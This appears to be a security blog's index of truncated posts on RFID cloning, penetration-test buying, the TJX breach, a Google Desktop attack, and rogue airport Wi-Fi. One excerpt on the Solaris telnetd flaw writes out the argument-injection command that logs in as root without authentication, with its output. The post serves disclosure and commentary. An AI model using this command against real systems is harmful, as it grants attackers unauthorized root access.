RFID security device manufacturer HID is using threats of patent infringement to stifle a Black Hat Federal presentation by Chris Paget on the threat of RFID card cloning. The risks of RFID card cloning are real and are nothing new. The details of the technology has been publicly available for years. What is new is the visceral demonstration that a device can provide. HID is scared that people will stop purchasing their technology once it is widely known that it is not secure. This shows the power of security researchers to get …

An article was forwarded to me today, entitled Avoid Wasting Money on Penetration Testing. While the core message is on target (i.e. be sure you know what you are getting before you sign on the dotted line), the suggestions for how to achieve this are misleading. Let’s examine the “5 steps to choosing a supplier” outlined in the article:

Ask if their consultants have passed an independent penetration testing assessment. There are some services that will independently test a consultant and rate their strengths and weaknesses in great detail.

You are going to weed out a lot of top-notch …

Watchfire just released a whitepaper on Overtaking Google Desktop which is a thought-provoking read. It essentially exploits the mechanism by which Google Desktop hooks the browser in order to inject links to the local Google Desktop instance when the user performs a typical online Google search. There are a couple of gating factors to making this attack viable — the initial attack vector requires an exploitable XSS vulnerability in google.com, and the victim must have Google Desktop’s browser integration feature enabled. An added twist is that a successful attack essentially gets cached by Google Desktop (since …

TJX issued a press release yesterday coming clean on what they know about the breach of their corporate network. They are now admitting that they have been compromised as early as July 2005 and continued to be compromised up until December 2006. It is unlikely only one attacker found the vulnerabilities exploited. I wouldn’t be surprized if dozens of attackers found their way into the network during that time.

One of the pieces of data stolen was driver license numbers given by customers when returning merchandise to “T.J. Maxx, Marshalls, and HomeGoods stores in the U.S. and …

An annoyingly stupid vulnerability in the stock Solaris 10/11 telnet daemon, courtesy of Full Disclosure (more details in this PDF, but it’s NSFW): Pass “-f[user]” as the “-l” option to telnet, and presto, you bypass the entire authentication process and are logged in as the user of your choice! Works for the root user too, as long as the server is configured to allow remote root logins.

ceng@localhost [~]$ telnet a.b.c.d -l “-froot”
Trying a.b.c.d…
Connected to a.b.c.d.
Escape character is ‘^]’.
Last login: Thu Feb 1 02:28:29 from w.x.y.z
JESv4 Message of The Day (MOTD)

Welcome to the Sun Java Enterprise System …

Like many of the people who will eventually read this, I’m packing my bags and heading to San Francisco tonight for the RSA Conference. For those of you also attending, please stop by our booth (#2612) and say hello. We’ll be giving demos of our service platform and discussing how our software-as-a-service delivery model will help solve application security problems that tool-based approaches can’t begin to address.

If you have a full conference pass, be sure to catch Chris Wysopal’s panel discussion, “Vulnerability Reporting and Full Disclosure: The Naked Truth”, on Wednesday at 10:30 AM in Burgundy …

A few weeks ago I was waiting for a flight in the JetBlue terminal of JFK. JetBlue offers free Wi-Fi to its customers, which is a nice touch. I powered up my laptop and this is what I saw:

If I’m your typical non-security-minded traveler, which of these networks am I most likely to connect to? I would guess that the majority of people will select one of the two with Jet Blue in the SSID, or maybe the one called Free Public Wi-Fi. Interestingly enough, the real JetBlue SSID is the one …